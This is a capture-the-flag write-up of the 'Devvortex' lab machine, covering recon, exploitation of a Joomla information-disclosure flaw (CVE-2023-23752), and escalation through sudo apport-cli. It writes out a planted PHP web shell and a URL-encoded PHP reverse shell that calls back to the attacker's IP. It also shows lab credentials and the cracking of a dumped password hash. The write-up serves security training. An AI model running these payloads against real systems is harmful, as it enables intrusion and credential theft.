Devvortex

Target IP: 10.129.229.146
Challenge Description: N/A.


Reconnaissance

cb02a96d1c7ce472b7e95651b685c809.png
Performing a port scan using the command sudo nmap -sS 10.129.229.146 -p- returns the result shown above. According to the scan above, there are two TCP ports open on the target machine.

3146636fc251eaa5c709282c553f98e7.png
I performed an aggressive port scan against the target machine using the command sudo nmap -sV -A 10.129.229.146 -p 22,80 and obtained the result shown above. I notice the HTTP request gets directed to http://devvortex.htb. Therefore, I will insert this username inside my /etc/hosts file. Time to perform a subdomain search using ffuf.

e3fdb80ac4ee912806870defb7e94d2c.png
Using the command ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154, I performed a subdomain search and identified the subdomain dev.devvortex.htb as shown above. Time to insert this new subdomain name inside my /etc/hosts file.

c8d4388ceb5818dd8fdb010457634531.png
Now my /etc/hosts file contains the entry shown above. Time to perform enumeration.


Enumeration

Port 80: HTTP (dev.devvortex.htb)

4b63149f1893df180a24629bf422824b.png
While performing a directory search against this subdomain using the command gobuster dir -u http://dev.devvortex.htb -w /usr/share/wordlists/dirb/big.txt -x html,php,txt, I identified an interesting entry with the name /README.txt. Browsing to this page contains the information shown above. By the looks of it, the target machine is running Joomla CMS. But what version is it? Time to find out.

    ____  _____  _____  __  __  ___   ___    __    _  _ 
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  ( 
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)
   
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://dev.devvortex.htb ...
                                                                                                                   
[+] FireWall Detector                                                                                                         
[++] Firewall not detected                                                                                                    
                                                                                                                              
[+] Detecting Joomla Version                                                                                                  
[++] Joomla 4.2.6                                                                                                             
                                                                                                                              
[+] Core Joomla Vulnerability                                                                                                 
[++] Target Joomla core is not vulnerable                                                                                     
                                                                                                                              
[+] Checking apache info/status files                                                                                         
[++] Readable info/status files are not found                                                                                 
                                                                                                                              
[+] admin finder                                                                                                              
[++] Admin page : http://dev.devvortex.htb/administrator/                                                                              
[+] Checking robots.txt existing                                                                                              
[++] robots.txt is found                                                                                                      
path : http://dev.devvortex.htb/robots.txt                                                                                                                                                                                                  
Interesting path found from robots.txt                                                                                        
http://dev.devvortex.htb/joomla/administrator/                                                                                
http://dev.devvortex.htb/administrator/                                                                                       
http://dev.devvortex.htb/api/                                                                                                 
http://dev.devvortex.htb/bin/                                                                                                 
http://dev.devvortex.htb/cache/                                                                                               
http://dev.devvortex.htb/cli/                                                                                                 
http://dev.devvortex.htb/components/                                                                                          
http://dev.devvortex.htb/includes/                                                                                            
http://dev.devvortex.htb/installation/                                                                                        
http://dev.devvortex.htb/language/                                                                                            
http://dev.devvortex.htb/layouts/                                                                                             
http://dev.devvortex.htb/libraries/                                                                                           
http://dev.devvortex.htb/logs/                                                                                                
http://dev.devvortex.htb/modules/                                                                                             
http://dev.devvortex.htb/plugins/                                                                                             
http://dev.devvortex.htb/tmp/                                                                                                 
                                                                                                                              
                                                                                                                              
[+] Finding common backup files name                                                                                          
[++] Backup files are not found                                                                                               
                                                                                                                              
[+] Finding common log files name                                                                                             
[++] error log is not found                                                                                                   
                                                                                                                              
[+] Checking sensitive config.php.x file                                                                                      
[++] Readable config files are not found                                                                                      
                                                                                                                              
                                                                                                                              
Your Report : reports/dev.devvortex.htb/

    ____  _____  _____  __  __  ___   ___    __    _  _ 
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  ( 
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)
   
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://dev.devvortex.htb ...
                                                                                                                   
[+] FireWall Detector                                                                                                         
[++] Firewall not detected                                                                                                    
                                                                                                                              
[+] Detecting Joomla Version                                                                                                  
[++] Joomla 4.2.6                                                                                                             
                                                                                                                              
[+] Core Joomla Vulnerability                                                                                                 
[++] Target Joomla core is not vulnerable                                                                                     
                                                                                                                              
[+] Checking apache info/status files                                                                                         
[++] Readable info/status files are not found                                                                                 
                                                                                                                              
[+] admin finder                                                                                                              
[++] Admin page : http://dev.devvortex.htb/administrator/                                                                              
[+] Checking robots.txt existing                                                                                              
[++] robots.txt is found                                                                                                      
path : http://dev.devvortex.htb/robots.txt                                                                                                                                                                                                  
Interesting path found from robots.txt                                                                                        
http://dev.devvortex.htb/joomla/administrator/                                                                                
http://dev.devvortex.htb/administrator/                                                                                       
http://dev.devvortex.htb/api/                                                                                                 
http://dev.devvortex.htb/bin/                                                                                                 
http://dev.devvortex.htb/cache/                                                                                               
http://dev.devvortex.htb/cli/                                                                                                 
http://dev.devvortex.htb/components/                                                                                          
http://dev.devvortex.htb/includes/                                                                                            
http://dev.devvortex.htb/installation/                                                                                        
http://dev.devvortex.htb/language/                                                                                            
http://dev.devvortex.htb/layouts/                                                                                             
http://dev.devvortex.htb/libraries/                                                                                           
http://dev.devvortex.htb/logs/                                                                                                
http://dev.devvortex.htb/modules/                                                                                             
http://dev.devvortex.htb/plugins/                                                                                             
http://dev.devvortex.htb/tmp/                                                                                                 
                                                                                                                              
                                                                                                                              
[+] Finding common backup files name                                                                                          
[++] Backup files are not found                                                                                               
                                                                                                                              
[+] Finding common log files name                                                                                             
[++] error log is not found                                                                                                   
                                                                                                                              
[+] Checking sensitive config.php.x file                                                                                      
[++] Readable config files are not found                                                                                      
                                                                                                                              
                                                                                                                              
Your Report : reports/dev.devvortex.htb/

Using the tool joomscan and the command joomscan -u http://dev.devvortex.htb, I obtained the result shown above. The target machine is running Joomla 4.2.6 as shownb above. This tool also identified interesting directories. Although the tool states there are no vulnerabilities for this version, I will need to search further.

6301db38cd8d7111bafc8e627625e384.png
And bingo! I searched for Joomla 4.2.6 vulnerability on Google and identified multiple results shown above. According to the results, it looks like this version suffers from information disclosure vulnerability. The CVE identifier for this vulnerability is CVE-2023-23752, as shown above.

b7cc33d07ca01742aba733fd126932f1.png
I also managed to find a verified exploit for this vulnerability at https://www.exploit-db.com/exploits/51334 using Exploit Database, as shown above. Time to make a copy of the exploit on my machine and run it against the target machine's web application. Since the tool is created in ruby, I will search for a Python exploit instead.

54c38f64965f6219458889993c291b0b.png
Searching for a working exploit on Github for the vulnerability, I found the repository shown above. I made a copy of the exploit on my machine with the name as exp.py. Time to test it :)


Exploitation

942bdf4eb298f32323e2d6e5cc1a5cfd.png
I ran the exploit using the command python3 exp.py. Then I used the mode 1 and targetted the hostname http://dev.devvortex.htb and got a hit, as shown above. This exploit successfully disclosed the credentials lewis:P4ntherg0t1n5r3c0n##.

96f7004a494d01a35781a7e974b81883.png
From previous enumeration, I identified the administrator page of Joomla is at http://dev.devvortex.htb/administrator. Maybe I can use the credentials here? Time to find out.

54faf0ec8dc7f530011dfac0770a9aa6.png
And bingo! I successfully logged into the administrator panel using the disclosed credentials via the exploit, as shown above. Since this user lewis is the administrator on this CMS, I will need to find a vector to obtain a foothold on the target machine. This is doable by overwriting one of the template file with a shell to obtain a reverse shell connection.

73af45c226a3ea8bd0231f5884537c85.png
I browsed to the System menu first. This is where the Site Templates are located, as shown above.

528b672bd7961408d93a20fe72716747.png
I notice the target machine is using Cassiopeia template, as shown above. Time to overwrite one of the PHP files inside this template and insert my PHP web shell to obtain a reverse shell connection.

c88ee7201937a317442fb5f3692cc705.png
I decided to overwrite the error.php, as shown above.

c4f2fbc4620084f4ce0a7ffb74e3a5bf.png
I inserted the PHP code system($_GET['totally_not_a_sh3ll']); as shown above inside the error.php. Now I should be able to access my web shell. Time to test it.

fa0b3ec04b00d95533bb08f7dfeb6805.png
And bingo! I browsed to http://dev.devvortex.htb/templates/cassiopeia/error.php?totally_not_a_sh3ll=id;whoami;ls and ran the commands id;whoami;ls and obtained the result shown above. My web shell is working successfully. Time to obtain a reverse shell connection now using this web shell.

ef531f3cabd6202f5d19ab4657c366df.png
I started a listener on my machine at port 8443. Then I deployed the URL-encoded PHP reverse shell code php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.14.112%22%2C8443%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 via the web shell and obtained a reverse shell connection as shown above. Now I have a foothold on the target machine with the session as www-data :) Then I upgraded my shell to a pty shell via python using the command python -c 'import pty; pty.spawn("/bin/bash")'.


Privilege Escalation

5759f980e4e79ec6f93e907c1c4af4de.png
From previous enumeration, I identified there is a database application running on the target machine. I decided to test the credentials I obtained via the exploit and obtained a session, as shown above. The command I used is mysql -h localhost -u lewis -p'P4ntherg0t1n5r3c0n##'. Then I ran the command show databases; and identified the database joomla. Maybe I can obtain interesting information inside this database? I used the command use joomla; to use this database;

c47c264d2b4611bcdfc3ff85d11bb99b.png
Using the command select * from sd4fg_users;, I obtained two entries shown above. Since one of the host on the target machine is a user called logan, maybe cracking the password hash shown above can help? I saved the password hash $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 of the user logan on my machine inside a file called hash to crack it using john.

a931b0d69497237abfb5cccd0219d9af.png
To crack the hash, I used the command john hash --wordlist=/usr/share/wordlists/rockyou.txt. I successfully obtained the password tequieromucho belonging to the user logan, as shown above.

6bab73d207ed201756f1f0cef78e3aa8.png
Using su logan and the new password tequieromucho, I was able to successfully switch to the user logan as shown above. I successfully escalated my privileges from www-data to logan horizontally.

06ebbd7aa3b90ed488c91ea179034edb.png
Running sudo -l returns the entry (ALL : ALL) /usr/bin/apport-cli. The binary aport-cli is executable as root. I did a Google search for this binary and obtained multiple privilege esclation techniques. One being the vulnerability with the CVE id of cve-2023-1326.

25ee0b8b581dc23ef6c65519ebdde044.png
Obtaining a root shell was pretty simple. I followed the instructions at https://diegojoelcondoriquispe.medium.com/cve-2023-1326-poc-c8f2a59d0e00. GG. This challenge was a lot of fun and the privilege escalation was a joy.


Flags

353b939081146158639e3ea5f84d3dd1.png
The two flags are shown above.